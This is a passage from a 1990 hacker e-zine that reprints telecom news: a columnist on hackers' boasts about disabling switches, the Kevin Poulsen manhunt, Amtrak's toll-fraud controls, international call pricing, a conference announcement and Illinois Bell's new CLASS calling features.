  5441. mail I received last week, slightly edited to correct grammatical
  5442. imperfections:  "It may be of interest to you to know, if I wanted to have
  5443. "fun," "evil" deeds could be done by remote control, up to and including
  5444. shutting down every ESS (electronic switching station) office in North America.
  5445.  
  5446.      "Less evil and more fun might be to shut down the stock market for a day,
  5447. scramble all transactions, or even send it down in a tail spin!  Banks aren't
  5448. immune either.  This may sound very darkside, but people must have what is
  5449. needed to fight back if things go bad!" Not disturbing enough?  Try this one on
  5450. for size:  Back in July of '89, I wrote of a story in the premier issue of the
  5451. magazine Mondo 2000 that detailed how one might set about hacking automatic
  5452. teller machines (ATMs).  That story contained everything but the blueprints for
  5453. the device, which the magazine's editors didn't print because they thought it
  5454. would be irresponsible to do so.  But now, a student-owned Cornell University
  5455. publication called "Visions Magazine" - for which Carl Sagan is creative
  5456. adviser - has asked the article's author, Morgan Russell, for rights to reprint
  5457. the article in its entirety, including device blueprints.
  5458.  
  5459.      These kinds of stories are disturbing, yet somehow I've always expected
  5460. they would happen, a reaction that's similar to the way I feel when I watch
  5461. "The Prisoner." No.  6, as he's called, cries out at the beginning of every
  5462. episode, "I am not a number!  I am a free man!" His will to resist is
  5463. sufficient to fend off the authorities who believe their need for the
  5464. "een-formation" in No.  6's head gives them the right to try to control his
  5465. movements and thoughts, using - of course - only the most impressive
  5466. technology.
  5467.  
  5468.      Of course, the science-fiction fantasy of impressive technology in the
  5469. '60s, when "The Prisoner" was created, was as authoritarian and centralized as
  5470. the governments using it.  Not many faceless authorities back then were
  5471. predicting a near-future where all classes of people had access to, could
  5472. afford and knew how to use powerful technology.  (I'm sure it would have ruined
  5473. their supper if they had.) Neither did they envision today's growing class of
  5474. technological sophisticates - whether self-taught PC hackers or trained
  5475. computer scientists - who, by virtue of their knowledge, could cripple,
  5476. disable, or otherwise confound the system which spawned them.  Have any opinion
  5477. you'd like about the right or wrong of it.  Fact is, whether it's the phone
  5478. network or a bank teller machine, the more we rely on technology, the less we
  5479. can rely on technology.
  5480.  
  5481.      Though this fact can make life unpleasant for those of us who are
  5482. victimized by either the machines we trust or the people who know how to fidget
  5483. with them, there is something strangely comforting about knowing that, after
  5484. all, a computer is still only as trustworthy as the humans who run it.  Write
  5485.  
  5486. CONTACT:
  5487. Denise Caruso, Spectra, San Francisco Examiner
  5488. P.O  Box 7260
  5489. San Francisco, CA 94120.   (Denise
  5490.  
  5491. MCI Mail (Denise Caruso) - CompuServe (73037,52) - CONNECT (Caruso)
  5492. _______________________________________________________________________________
  5493.  
  5494. HEADLINE  US Sprint to Supply Soviet Venture With Switches
  5495. DATE      09/17/90
  5496. SOURCE    WALL STREET JOURNAL (WJ)
  5497.  
  5498.  
  5499. WASHINGTON -- US Sprint Communications Corp.  said it obtained U.S.  government
  5500. approval to supply a Soviet joint venture with packet switches that can greatly
  5501. improve telecommunications services between the Soviet Union and other
  5502. countries.  The imminent shipment of these switches was announced by William
  5503. Esrey, chairman and chief executive officer of United Telecommunications Inc.,
  5504. shortly after completing a visit to the Soviet Union with Commerce Secretary
  5505. Robert Mosbacher and the chief executives of other U.S.  companies.  United
  5506. Telecommunications is the parent of US Sprint.
  5507.  
  5508.       The export license that US Sprint expects to obtain as early as this week
  5509. will be the first license for telecommunications equipment granted by the U.S.
  5510. under the new, relaxed regulations for shipping technology to the Soviet Union,
  5511. Esrey said.  * The Soviet venture, Telenet USSR, will be owned by a US Sprint
  5512. subsidiary, Sprint International, and the Soviet Ministry of Post and
  5513. Telecommunications and the Larvian Academy of Sciences, a Soviet research
  5514. group.  The Commerce Department doesn't discuss details of individual license
  5515. applications, but Mosbacher has publicly supported technology tie-ups between
  5516. the U.S.  companies represented in his traveling group and potential Soviet
  5517. partners.  US Sprint appears to be leading the race among American
  5518. telecommunications companies to establish solid ties in the Soviet Union.  An
  5519. earlier proposal by U S West Inc.  to lay down part of an international
  5520. fiber-optic line across the Soviet Union was rejected by U.S.  authorities
  5521. because of the advanced nature of the technology.
  5522.  
  5523.      US Sprint's packet switches, however, appear to be within the new
  5524. standards for permissible exports to the Soviet Union.  The switches are used
  5525. to route telephone calls and control traffic in voice, facsimile and
  5526. digitalized data transmission.  These eight-bit switches are one or two
  5527. generations behind the comparable systems in use in Western countries, but are
  5528. still good enough to sharply improve the ability of Sprint's Soviet customers
  5529. to communicate with other countries, Esrey's aides said.  The company declined
  5530. to discuss the value of its investment or to disclose how many switches will be
  5531. sold.  US Sprint said its venture will operate through new, dedicated satellite
  5532. lines that will augment the often-congested 32 international lines that
  5533. currently exist for Moscow-based businesses.  Esrey said he expects the venture
  5534. to be in operation before the end of this year.
  5535. _______________________________________________________________________________
  5536.  
  5537. HEADLINE  BT Tymnet Introduces Additional XLINK Services
  5538. DATE      09/09/90
  5539. SOURCE    DOW JONES NEWS WIRE
  5540.  
  5541. SAN JOSE, Calif.  -DJ- BT Tymnet Inc.  said XLINK Express, a family of new,
  5542. bundled, port-based, synchronous X.25 (XLINKs) services, is available.  The
  5543. XLINK service offers customers lower cost X.25 host access to its TYMNET
  5544. network, the company said in a news release.  XLINKs are leased-line private
  5545. access port services for X.25 interfaces at speeds up to 19.2 bits per second
  5546. and supporting up to 64 virtual circuits.
  5547.  
  5548. XLINK Express includes port access, leased line, modems, software, and free
  5549. data transmission.  Prior to XLINK Express, customers requiring a
  5550. 9.6-bit-per-second leased line for standard X.25 host connectivity would
  5551. typically pay about $1,500 monthly for their leased line, modems and interface.
  5552. With XLINK, customers can now be charged a monthly rate of $900, the company
  5553. said.
  5554.  
  5555. BT Tymnet Inc.  is a unit of British Telecom plc.
  5556. _______________________________________________________________________________
  5557.  
  5558. HEADLINE  Hacker may be taunting the FBI; Whiz suspected of invading U.S. army
  5559.           computer
  5560.           Credit:   PENINSULA TIMES TRIBUNE
  5561. DATE      04/10/90
  5562. SOURCE    Montreal Gazette   (GAZ)
  5563.           Edition:  FINAL
  5564.           Section:  NEWS
  5565.           Page:     F16
  5566.           Origin:   PALO ALTO, Calif.
  5567.           (Copyright The Gazette)
  5568.  
  5569.           --- Hacker may be taunting the FBI; Whiz suspected of invading
  5570.                                    U.S. army computer                       ---
  5571.  
  5572. PALO ALTO, Calif.  - The computer prodigy wanted on suspicion of invading a
  5573. U.S.  army computer may be taunting FBI agents by defiantly talking to his
  5574. hacker buddies on electronic bulletin boards while he eludes a manhunt,
  5575. authorities said.  The mysterious Kevin Poulsen, a former Menlo Park, Calif.,
  5576. resident described by many as a computer genius, is outsmarting the FBI and
  5577. apparently has the savvy to make this game of hide-and-seek a long contest.
  5578.  
  5579.      No, investigators are not getting frustrated, FBI official Duke Diedrich
  5580. said.  "It's just a matter of time.  We've got our traps and hopefully one day
  5581. we'll be able to get the mouse." Authorities have issued an arrest warrant for
  5582. the former SRI International computer expert.  He has been at large since at
  5583. least Jan.  18, when federal officials revealed allegations of a sensational
  5584. computer conspiracy.  The FBI says Poulsen, 24, is the mastermind of a complex
  5585. computer and telephone-system invasion that included breaking into an
  5586. unclassified army computer network, snooping on the FBI and eavesdropping on
  5587. the calls of a former girlfriend.  FBI agents believe he may be in southern
  5588. California, but because he is apparently still hooked up to a national network
  5589. of hackers, he could be using his friends to hide just about anywhere, Diedrich
  5590. said.  Poulsen is adept at manufacturing false identification and knows how to
  5591. use the phone system to cover traces of his calls.
  5592.  
  5593.      Agents believe his hacker talk on electronic bulletin boards is perhaps "a
  5594. way of taunting law enforcement officials," Diedrich said.  Poulsen may be back
  5595. to his old tricks, but "he's not hiding with the usual bunch of hackers," said
  5596. John Maxfield, a computer security consultant and former FBI informant.
  5597.  
  5598.      Maxfield, known nationally as a "narc" among young hackers, said he had
  5599. underground sources who said Poulsen was rumored to be living alone in a
  5600. southern California apartment.  Poulsen's computer chatter could lead to his
  5601. downfall, Maxfield said.  Many hackers are electronic anarchists who would be
  5602. happy to turn in a high-ranking hacker, thereby pushing themselves up the
  5603. status ladder, he said.  But Poulsen probably has access to a steady flow of
  5604. cash, so he doesn't have to get a job that might lead to his arrest, Maxfield
  5605. said.
  5606.  
  5607.      With his expertise, Poulsen could easily crack the bank computers that
  5608. validate cash transactions and then credit his own accounts, Maxfield said.
  5609. The FBI isn't desperate, but agents have contacted America's Most Wanted, a
  5610. television show that asks viewers to help authorities find fugitives.
  5611.  
  5612.      Poulsen's mother, Bernadine, said her son called home just after police
  5613. announced there was a warrant for his arrest, but he had not called since.
  5614. During the brief call, "He just apologized for all the stress he was causing
  5615. us." The fugitive's motivation baffles Maxfield.
  5616.  
  5617.      The self-described "hacker tracker" has conducted investigations that have
  5618. led to dozens of arrests, but the Poulsen-contrived conspiracy as alleged by
  5619. the FBI is strange, he said.  Most teen-age hackers are thrill seekers, he
  5620. explained.  The more dangerous the scam, the bigger the high.  But Poulsen is
  5621. 24.  "Why is he still doing it?" Maxfield asked.
  5622.  
  5623.      Poulsen, alias "Dark Dante" and "Master of Impact," was a member of an
  5624. elite hacker gang called Legion of Doom.  [Poulsen was never a member of the
  5625. group -DH]
  5626.  
  5627. The 25 or so mischievous members are now being arrested one by one, Maxfield
  5628. said.  They consider themselves misfits, but smart misfits who are superior to
  5629. the masses of average people who have so labelled them, he said.  [Baha,
  5630. Maxfield really cracks me up  -DH]
  5631.  
  5632. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5633.  
  5634.      Kevin recently had a 15 minute television debut on NBC's "Unsolved
  5635. Mystries".  The program showed renactments of Kevin breaking into CO's and
  5636. walking around his apartment filled with computers and other 'listening'
  5637. devices (as the show called them).
  5638.  
  5639.      I personally got a kick out of the photographs he took of himself holding
  5640. switching equipment after a break-in at a CO.
  5641. _______________________________________________________________________________
  5642.  
  5643. HEADLINE  Amtrak Gets Aboard SDN
  5644.           Byline:   BETH SCHULTZ
  5645. DATE      10/25/90
  5646. SOURCE    COMMUNICATIONS WEEK
  5647.           Issue:    267
  5648.           Section:  PN
  5649.           Page:     58
  5650.           (Copyright 1989 CMP Publications, Inc.  All rights reserved.)
  5651.  
  5652. WASHINGTON - Amtrak, always looking for ways to reduce the amount of government
  5653. funding it takes to keep it on track, has switched its long distance traffic
  5654. onto a virtual private network-taking advantage of an AT&T promotion that saved
  5655. the railroad $250,000.  Though Amtrak realized the cost-savings potential of
  5656. AT&T's Software Defined Network (SDN) as early as May 1987, it took until last
  5657. spring for the company to move full-speed ahead with implementation of that
  5658. virtual private network service.  "We had led the horse to water, but we
  5659. couldn't make it drink," said Jim West, an AT&T national systems consultant.
  5660.  
  5661.      But in April of this year, AT&T removed the last obstacle in the
  5662. railroad's way, said Amtrak's chief network engineer Matt Brunk.  At that time,
  5663. AT&T began running a special promotion that waived the installation fee for
  5664. connecting sites to the SDN.  Until then, Amtrak, based here, could only afford
  5665. adding locations piecemeal.
  5666.  
  5667.      Plagued by network abuse, Amtrak began tracking the potential of SDN as a
  5668. means of solving that problem as soon as AT&T announced its SDN rates in
  5669. December 1986.  Describing the severity of its toll-fraud problem, Brunk told
  5670. of a seven-day stint in 1985 during which hackers tallied $185,000 in
  5671. unauthorized charges.  By the end of that year, toll fraud on Amtrak's network
  5672. reached in excess of $1 million.
  5673.  
  5674.      Before the days of the virtual private network, the only way to clean up
  5675. this abuse was through a toll-free "800" service configuration and PBX remote
  5676. access, which Amtrak implemented at the end of 1985.  "We changed the policy
  5677. and procedures for all users, limiting the capabilities of remotaccess," Brunk
  5678. said.
  5679.  
  5680.      But Amtrak needed to further patrol its network, and after studying AT&T's
  5681. SDN, as well as competitive offerings, the railroad ordered in May 1987 the
  5682. first portion of what would this year become a 300-site SDN.  The initial order
  5683. included AT&T Accunet T1.5 circuits for just two stations, one in Chicago and
  5684. one here.  Used to replace the 800 service, these 1.544-megabit-per-second
  5685. direct connections were used to "provide secure remote access to on-net numbers
  5686. for numerous users," Brunk said.
  5687.  
  5688.      Equally important, Amtrak also signed up for the Network Remote Access
  5689. Fraud Control feature, which gives it a single point of control over the
  5690. network.  "What Amtrak ordered then was not really a network, because it was
  5691. feature-specific," said AT&T national account manager Sharon Juergens.
  5692.  
  5693.      The company has not billed back or dropped any toll fraud since it began
  5694. using the SDN remote access feature, Brunk said.  "Anyone with PBX
  5695. remote-access capability and :heavy!  volume not using SDN as a vehicle is
  5696. doing their company a disservice."
  5697.  
  5698.      Originally a beta-test site for the SDN's security-report feature, Amtrak
  5699. has since come to rely heavily on that option, too.  With the exception of some
  5700. group codes, a warning is sent if spending on any user code exceeds $60 per
  5701. month.  "We begin investigating immediately," Brunk said.  "We are now
  5702. proactive, instead of reactive."
  5703.  
  5704.      Today, 40 Amtrak locations have switched-access connections to the SDN;
  5705. 260 sites are linked through dedicated means, whether through voice-grade
  5706. analog circuits or high-speed T1s.  "The users' traffic is discounted, on a
  5707. single billing statement, and in effect, :the SDN!  links them to the company.
  5708. This is our corporate communications glue," Brunk said.  "But this is only the
  5709. beginning.  Not only have we provided a service, but also we have provided a
  5710. bright future.  We have set ourselves up for competitive gain." Spending
  5711. Stabilized And the company has stabilized telecommunications expenditures.  In
  5712. 1985, Amtrak spent $26 million on telecom equipment and services.  Four years
  5713. later, Brunk estimated the railroad will spend just $1 million more.  He said
  5714. contributing factors to this will be the SDN, upgrading from outdated analog
  5715. PBXs to digital PBXs and replacing some PBX installations with local
  5716. Bell-provided centrex service.  Network savings resulting from reduced
  5717. call-setup time alone, Brunk added, will reach $74,000 this year.
  5718.  
  5719.      "In a nutshell, we have improved transmission quality, network management
  5720. and maintenance, and reduced costs," Brunk said.  "The users have gained a
  5721. single authorization code accessing multiple applications, improved quality and
  5722. support."
  5723.  
  5724.      Cost savings aside, Amtrak also took into consideration applications
  5725. available off the SDN.  "At the time, of what was available, we really liked
  5726. everything about SDN," Brunk said.
  5727.  
  5728.      The Amtrak network is supported by the dedicated access trunk testing
  5729. system.  This system lets Amtrak test access lines, thus aiding the company in
  5730. activating and deactivating authorization codes.  And Amtrak is testing the
  5731. AT&T Alliance dedicated teleconferencing service.
  5732.  
  5733.      With the teleconferencing service, Amtrak can reduce internal travel
  5734. expenditures:  Users can access the system remotely via an 800 number, or on
  5735. demand.  Amtrak operators can connect teleconferencing calls at any time.  "The
  5736. quality is fantastic, but the cost is even better because it's all connected to
  5737. the SDN," said Brunk.
  5738.  
  5739. _______________________________________________________________________________
  5740.  
  5741.  
  5742.                         KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
  5743.  
  5744.                               K N I G H T L I N E
  5745.  
  5746.                             Issue 01/Part II of III
  5747.  
  5748.                             17th of November, 1990
  5749.  
  5750.                               Written, compiled,
  5751.  
  5752.                            and edited by Doc Holiday
  5753.  
  5754.                         KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
  5755.  
  5756.                                       ---
  5757.                            F R O M   T H E   W I R E
  5758. _______________________________________________________________________________
  5759.  
  5760. HEADLINE  ADAPTING DIGITAL SWITCH -- Fujitsu To Expand In U.S.
  5761.           Byline:   ROBERT POE
  5762. DATE      11/15/90
  5763. SOURCE    COMMUNICATIONSWEEK   (CWK)
  5764.           Issue:    322
  5765.           Section:  PUBLIC NETWORKING
  5766.           Page:     33
  5767.           (Copyright 1990 CMP Publications, Inc.  All rights reserved.)
  5768.  
  5769. RALEIGH, N.C.-Fujitsu Ltd.  is boosting efforts to adapt its digital exchange
  5770. to the U.S.  network, in anticipation of the $40 billion public switch
  5771. changeout expected in the United States over the next 10 to 15 years.
  5772.  
  5773. Fujitsu plans to increase the number of U.S.  staff members in charge of
  5774. selling and engineering the Fetex-150 switch to 600 by 1994 from the current
  5775. 100, officials at the Tokyo-based company said.
  5776.  
  5777. The increase will shift development of sophisticated switch features from Japan
  5778. to the United States, said one observer familiar with Fujitsu Network Switching
  5779. of America Inc., based here.
  5780.  
  5781. FILLING U.S. NEEDS
  5782.  
  5783. Most of the current staff there is working on testing the performance and
  5784. network conformance of software developed in Japan, the observer said.  With
  5785. the expansion, the subsidiary will be responsible for developing functions and
  5786. capabilities required by U.S.  customers.
  5787.  
  5788. The Fetex-150 is Fujitsu's export-model exchange switch, with more than 8.8
  5789. million lines installed or on order in 17 countries.  None have been sold in
  5790. the United States, but the recently announced plans confirm longstanding
  5791. speculation that the Japanese manufacturer is planning a major push into the
  5792. U.S.
  5793.  
  5794. When Fujitsu won a major switch tender in Singapore last autumn, competitors
  5795. complained it was selling the equipment at cost to win a prestigious contract
  5796. that would serve as a stepping-stone to the United States.
  5797.  
  5798. WOOING THE BELLS
  5799.  
  5800. Fujitsu said its switch has passed Phase 1 and Phase 2 evaluations by Bell
  5801. Communications Research Inc., Livingston, N.J., the research arm of the seven
  5802. U.S.  regional Bell companies.  Although the Bellcore certification is
  5803. considered essential to selling to the Bells-which account for about 75 percent
  5804. of U.S.  telephone lines-it may not be enough for the company to break into a
  5805. market dominated by AT&T and Nashville, Tenn.-based Northern Telecom Inc.
  5806.  
  5807. Those two manufacturers have more than 90 percent of the U.S.  market.  A share
  5808. like that, coupled with Bell company inertia in changing to new suppliers,
  5809. leaves foreign public switch manufacturers largely out in the cold, analysts
  5810. said.
  5811.  
  5812. The U.S.  subsidiaries of Siemens AG, L.M.  Ericsson Telephone Co., NEC Corp.
  5813. and GEC Plessey Telecommunications Ltd.  have found the U.S.  market tough to
  5814. crack, though each has had limited success and is further along than Fujitsu.
  5815.  
  5816. `INHERENT CONSERVATISM'
  5817.  
  5818. "There's an inherent conservatism on the part of their {U.S.} customer base,"
  5819. said Robert Rosenberg, director of analytical services at The Eastern
  5820. Management Group, Parsippany, N.J.  "These are huge companies with billions of
  5821. dollars invested in their current equipment.
  5822.  
  5823. "Even if Fujitsu comes up with a switch that has all the bells and whistles
  5824. that an engineer could ever want, if all the support systems have to be rebuilt
  5825. in order to fit that switch into the network, his manager won't let him install
  5826. it," Rosenberg said.
  5827.  
  5828.  
  5829.  
  5830. _______________________________________________________________________________
  5831.  
  5832.  
  5833. Telephone Services:  A Growing Form Of "Foreign Aid"
  5834.  
  5835. Keith Bradsher, {The New York Times}, Sunday, October 21, 1990
  5836.                 (Business section, page 5)
  5837.  
  5838.  Americans who make international telephone calls are paying extra to
  5839. subsidize foreign countries' postal rates, local phone service, even
  5840. schools and armies.
  5841.  
  5842.  These subsidies are included in quarterly payments that American
  5843. telephone companies must make to their counterparts overseas, most of
  5844. these are state-owned monopolies.  The net payments, totaling $2.4
  5845. billion last year, form one of the fastest-growing pieces of the
  5846. American trade deficit, and prompted the Federal communications
  5847. Commission this summer to begin an effort that could push down the
  5848. price that consumers pay for an international phone call by up to 50
  5849. percent within three years.
  5850.  
  5851.  The imbalance is a largely unforeseen side effect of the growth of
  5852. competition in the American long-distance industry during the 1980's.
  5853. The competition drove down outbound rates from the United States,
  5854. while overseas monopolies kept their rates high.
  5855.  
  5856.  The result is that business and families spread among countries try
  5857. to make sure that calls originate in the United States.  Outbound
  5858. calls from the United States now outnumber inbound calls by 1.7-to-1,
  5859. in minutes -- meaning American phone companies have to pay fees for
  5860. the surplus calls.  The F.C.C. is concerned that foreign companies are
  5861. demanding much more money than is justified, given the steeply falling
  5862. costs of providing service, and proposes to limit unilaterally the
  5863. payments American carriers make.
  5864.  
  5865.  Central and South American countries filed formal protests against
  5866. the F.C.C.'s plan on October 12.  Although developed countries like
  5867. Britain and Japan account for more than half of United States
  5868. international telephone traffic, some of the largest imbalances in
  5869. traffic are with developing countries, which spend the foreign
  5870. exchange on everything from school systems to weapons.  The deficit
  5871. with Columbia, for example, soared to $71 million last year.
  5872.  
  5873.  International charges are based on formulas assigning per-minute
  5874. costs of receiving and overseas call and routing it within the home
  5875. country.  But while actual costs have dropped in recent years, the
  5876. formulas have been very slow to adjust, if they are adjusted at all.
  5877. For example, while few international calls require operators, the
  5878. formulas are still based on such expenses.
  5879.  
  5880.  Furthermore, the investment required for each telephone line in an
  5881. undersea cable or aboard a satellite has plummeted with technological
  5882. advances.  A trans-Pacific cable with 600,000 lines, announced last
  5883. Wednesday and scheduled to go into service in 1996, could cost less
  5884. than $1,000 per line.
  5885.  
  5886.  Yet the phone company formulas keep charges high.  Germany's Deutsche
  5887. Bundespost, for example, currently collects 87 cents a minute from
  5888. American carriers, which actually lose money on some of the off-peak
  5889. rates they offer American consumers.
  5890.  
  5891. MORE CALLS FROM THE U.S. ARE GENERATING A GROWING TRADE DEFICIT
  5892.  
  5893. U.S. telephone companies charge less for      1980   0.3   (billions of
  5894. overseas calls than foreign companies         1981   0.5    U.S. dollars)
  5895. charge for calls the United States.  So       1982   0.7
  5896. more international calls originate in the     1983   1.0
  5897. United States.  But the U.S. companies pay    1984   1.2
  5898. high fees to their foreign counterparts for   1985   1.1
  5899. handling those extra calls, and the deficit   1986   1.4
  5900. has ballooned in the last decade.             1987   1.7
  5901.                                               1988   2.0
  5902.                                               1989   2.4 (estimate)
  5903. (Source: F.C.C.)
  5904.  
  5905. THE LONG DISTANCE USAGE IMBALANCE
  5906.  
  5907. Outgoing and incoming U.S. telephone traffic, in 1988, the latest year
  5908. for which figures are available, in percent.
  5909.  
  5910. Whom are we calling?              Who's calling us?
  5911. Total outgoing traffic:           Total incoming traffic:
  5912. 5,325 million minutes             3,155 million minutes
  5913.  
  5914.   Other:      47.9%                  Other:      32.9%
  5915.   Canada:     20.2%                  Canada:     35.2%
  5916.   Britain:     9.1%                  Britain:    12.6%
  5917.   Mexico:      8.8%                  Mexico:      6.2%
  5918.   W. Germany:  6.9%                  W. Germany:  5.4%
  5919.   Japan:       4.4%                  Japan:       4.3%
  5920.   France:      2.7%                  France:      3.4%
  5921.  
  5922. (Source:  International Institute of Communications)
  5923.  
  5924. COMPARING COSTS:  Price range of five-minute international calls between
  5925. the U.S. and other nations.  Figures do not include volume discounts.
  5926.  
  5927. Country            From U.S.*          To U.S.
  5928.  
  5929. Britain            $2.95 to $5.20      $4.63 to $6.58
  5930. Canada (NYC to     $0.90 to $2.25      $1.35 to $2.26
  5931.   Montreal)
  5932. France             $3.10 to $5.95      $4.72 to $7.73
  5933. Japan              $4.00 to $8.01      $4.67 to $8.34
  5934. Mexico (NYC to     $4.50 to $7.41      $4.24 to $6.36
  5935.   Mexico City)
  5936. West Germany       $3.10 to $6.13      $10.22
  5937.  
  5938. * For lowest rates, callers pay a monthly $3 fee.
  5939. (Source: A.T.&T.)
  5940.  
  5941. WHERE THE DEFICIT FALLS: Leading nations with which the United States
  5942. has a trade deficit in telephone services, in 1989, in millions of
  5943. dollars.
  5944.  
  5945. Mexico:               $534
  5946. W. Germany:            167
  5947. Philippines:           115
  5948. South Korea:           112
  5949. Japan:                  79
  5950. Dominican Republic:     75
  5951. Columbia:               71
  5952. Italy:                  70       (Source: F.C.C.)
  5953. Israel:                 57
  5954. Britain:                46
  5955.  
  5956. THE RUSH TOWARD LOWER COSTS: The cost per telephone line for laying
  5957. each of the eight telephone cables that now span the Atlantic Ocean,
  5958. from the one in 1956, which held 48 lines, to the planned 1992 cable
  5959. which is expected to carry 80,000 lines.  In current dollars.
  5960.  
  5961. 1956       $557,000
  5962. 1959        436,000
  5963. 1963        289,000
  5964. 1965        365,000
  5965. 1970         49,000
  5966. 1976         25,000
  5967. 1983         23,000               (Source, F.C.C.)
  5968. 1988          9,000
  5969. 1992          5,400  (estimate)
  5970.  
  5971.  
  5972.  
  5973. _______________________________________________________________________________
  5974.  
  5975. A few notes from Jim Warren in regards to the CFP conference:
  5976.  
  5977.  
  5978. Greetings,
  5979.   Some key issues are now settled, with some minor remain for resolution.
  5980.  
  5981. CONFERENCE DATES, LOCATION & MAXIMUM SIZE
  5982.  
  5983. We have finally completed site selection and contracted for the Conference
  5984. facility.  Please mark your calendars and spread the word:
  5985.  
  5986.                First Conference on Computers, Freedom & Privacy
  5987.                        March 25-28,1991, Monday-Thursday
  5988.                      SFO Marriott, Burlingame, California
  5989.               (just south of San Francisco International Airport;
  5990.        on the San Francisco Peninsula, about 20 minutes from "The City")
  5991.                             maximum attendance: 600
  5992.  
  5993. PLEASE NOTE NAME CHANGE
  5994.  
  5995. We have found *ample* issues for a very robust Conference, limited only to
  5996. computer-related issues of responsible freedom and privacy.  After questions
  5997. regarding satellite surveillance, genetic engineering, photo traffic radar,
  5998. wireless phone bugs, etc., we decided to modify the Conference title for
  5999. greater accuracy.  We have changed it from "Technology, Freedom & Privacy" to
  6000. "Computers, Freedom & Privacy."
  6001.  
  6002. ONE MORE NIT TO PICK
  6003.  
  6004. Until recently, our draft title has included, "First International Conference".
  6005.  
  6006. We most definitely are planning for international participation, especially
  6007. expecting presentations from EEC and Canadian privacy and access agencies.
  6008. These will soon have significant impacts on trans-border dataflow and inter-
  6009. national business communications.
  6010.  
  6011. However, we were just told that some agencies require multi-month clearance
  6012. procedures for staff attending any event with "International" in its title.
  6013.  
  6014. **Your input on this and the minor issue of whether to include "International"
  6015. in our Conference title would be appreciated.**
  6016.  
  6017. ATTRIBUTION (BLAME)
  6018.  
  6019. We are building the first bridge connecting the major, highly diverse villages
  6020. of our new electronic frontier.  Such construction involves some degree of
  6021. exploration and learning.
  6022.  
  6023. These title-changes are a result of that learning process.  Please attribute
  6024. all responsibility for the fluctuating Conference title to me, personally.  I
  6025. am the one who proposed the first title; I am the one who has changed it to
  6026. enhance accuracy and avoid conflict.
  6027.  
  6028. Of course, the title will be settled and finalized (with your kind assistance)
  6029. before the Conference is formally announced and publicity statements issued --
  6030. soon!
  6031.  
  6032. Thanking you for your interest and continued assistance, I remain, Sincerely,
  6033.  
  6034.                                                  --Jim Warren, CFP Conf Chair
  6035.                                                         jwarren@well.ca.sf.us
  6036.  
  6037. _______________________________________________________________________________
  6038.  
  6039. [Reprented from TELECOM digest. --DH]
  6040.  
  6041.  
  6042.                  FROM: Patrick Townson <telecom@eecs.nwu.edu>
  6043.                     SUBJECT: Illinois Bell Shows Real CLASS
  6044.  
  6045.      For several months now, Illinois Bell has been hawking CLASS.  Brochures
  6046. in the mail with our bills and newspaper advertisements have told us about the
  6047. wonderful new services soon to be offered.
  6048.  
  6049. It was just a question, they said, of waiting until your central office had
  6050. been converted.  The new features being offered are:
  6051.  
  6052.  *66  Auto Call Back:  Call back the last number which called you. No
  6053.                        need to know the number.
  6054.  
  6055.  *69  Repeat Dial:     If the number you dialed was busy, punching
  6056.                        this will keep trying the number for up to
  6057.                        30 minutes, and advise you when it can connect.
  6058.  
  6059.  *60  Call Screening   Enter:
  6060.                        # plus number to be screened out plus #
  6061.                        * plus number to be re-admitted  plus *
  6062.                        # plus 01 plus # to add the number of the
  6063.                          last call you received, whether or not
  6064.                          you know the number.
  6065.                        1 To play a list of the numbers being screened.
  6066.                        0 For a helpful recording of options, etc.
  6067.  
  6068. Distinctive Ringing    Up to ten numbers can be programmed in. When a
  6069.                        call is received from one of these numbers, your
  6070.                        phone will give a special ring to advise you.
  6071.  
  6072. Multi-Ring Service     Two additional numbers can be associated with
  6073.                        your number. When someone dials one of these
  6074.                        two numbers, your phone will give a special ring.
  6075.  
  6076. With both Distinctive Ringing and Multi-Ring Service, if you have Call Waiting,
  6077. the Call Waiting tones will be different from the norm also, so that you can
  6078. tell what is happening.  With Multi-Ring Service, you can have it programmed so
  6079. the supplementary numbers associated with your main number are forwarded when
  6080. it is forwarded, or do not observe forwarding, and 'ring through' despite what
  6081. the main number is doing.
  6082.  
  6083. Alternate Answer       Can be programmed so that after 3-7 rings,
  6084.                        the unanswered call will be automatically sent
  6085.                        to another line *WITHIN YOUR CENTRAL OFFICE*.
  6086.  
  6087.                        If the number assigned as an alternate is
  6088.                        itself busy or forwarded OUTSIDE YOUR OFFICE
  6089.                        then Alternate Answer will not forward the
  6090.                        call and continue to ring unanswered.
  6091.  
  6092. Transfer on Busy/      This is just another name for 'hunt'. The
  6093.         No Answer      difference is that hunt is free; Transfer on
  6094.                        Busy/NA  costs a couple bucks per month. Like
  6095.                        Alternate Answer, it must forward only to a
  6096.                        number on the same switch. Unlike hunt, it
  6097.                        will work on NA as well. Unlike Alternate
  6098.                        Answer, it works on busy as well.
  6099.  
  6100. Caller*ID will be available 'eventually' they say.
  6101.  
  6102. Now my story begins:
  6103.  
  6104.      From early this summer to the present, I've waited patiently for CLASS to
  6105. be available in Chicago-Rogers Park.  Finally a date was announced:  October 15
  6106. the above features would be available.  In mid-September, I spoke with a rep in
  6107. the Irving-Kildare Business Office.  She assured me *all* the above features
  6108. would be available on October 15.  My bill is cut on the 13th of each month,
  6109. and knowing the nightmare of reading a bill which has had changes made in
  6110. mid-month (page after page of pro-rata entries for credits on the old service,
  6111. item by item; pro-rata entries for the new service going in, etc) it made sense
  6112. to implement changes on the billing date, to keep the statement simple.
  6113.  
  6114.      She couldn't write the order for the service to start October 13, since
  6115. CLASS was not officially available until the fifteenth.  Well, okay, so its
  6116. either wait until November 13 or go ahead and start in mid-month, worrying
  6117. about reading the bill once it actually arrives.
  6118.  
  6119.      I've been ambivilent about CLASS since it is not compatible with my
  6120. present service 'Starline', but after much thought -- and since all
  6121. installation and order-writing on Custom Calling features is free now through
  6122. December 31!  -- I decided to try out the new stuff.
  6123.  
  6124.      She took the order Wednesday afternoon and quoted 'sometime Thursday' for
  6125. the work to be done.  In fact it was done -- or mostly done -- by mid-afternoon
  6126. Thursday.  But I should have known better.  I should have remembered my
  6127. experience with Starline three years ago, when it took a technician in the
  6128. central office *one week* to get it all in and working correctly.  Still, I
  6129. took IBT's word for it.
  6130.  
  6131.      I got home about 5:30 PM Thursday.  *You know* I sat down right away at
  6132. the phone to begin testing the new features!  :) The lines were to be equipped
  6133. as follows:
  6134.  
  6135. Line 1:  Call Waiting                Line 2:  Call Forwarding
  6136.          Three Way Calling                    Speed Dial 8
  6137.          Call Forwarding                      Busy Repeat Dialing *69
  6138.          Speed Dial 8
  6139.          Auto Call Back  *66         (second line used mostly by modem;
  6140.          Busy Repeat Dialing *69      so Call Waiting undesirable)
